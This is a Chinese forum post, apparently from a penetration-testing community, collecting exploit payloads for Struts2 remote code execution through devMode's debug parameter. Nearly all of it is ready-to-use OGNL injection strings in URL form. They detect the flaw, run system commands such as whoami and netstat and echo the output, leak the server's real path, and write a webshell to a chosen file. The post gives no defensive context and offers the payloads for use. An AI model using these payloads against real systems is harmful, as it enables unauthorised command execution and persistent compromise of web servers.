devMode Struts2远程代码执行漏洞

渗透小能手

检测POC：
?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789

[/url]


命令执行回显POC：
?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=netstat -ano

[url=http://static.wooyun.org/upload/image/201607/2016071215082754980.png]


http://mp.weixin.qq.com/s?__biz= ... d=0#wechat_redirect



在探测struts是否开启调试模式时，可以用debug=xml去检测

例如目标URL：http://www.evil.com/target.action

URL地址 http://www.evil.com/target.action?debug=xml会返回struts的配置xml信息

看到大家都是用的debug=browser，再补充一个的POC：

1. debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp1=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[4000],%23d.read%28%23e%29,%23resp1.println%28%23e%29,%23resp1.close%28%29&
   

复制代码

再写几个poc：探测 返回路径

1. debug=browser&object=
   
2. (%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=devMode dir--***

复制代码

命令执行

1. debug=browser&object=
   
2. (%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%2c%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%23parameters.command%5B0%5D%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char%5B51020%5D%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close&command=whoami

复制代码

getshell

1. debug=browser&object=
   
2. (%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23parameters.reqobj[1],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.reqobj[2]),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=shellPath&reqobj=OK&content=xxxxxx

复制代码

xema

这个厉害，用firebug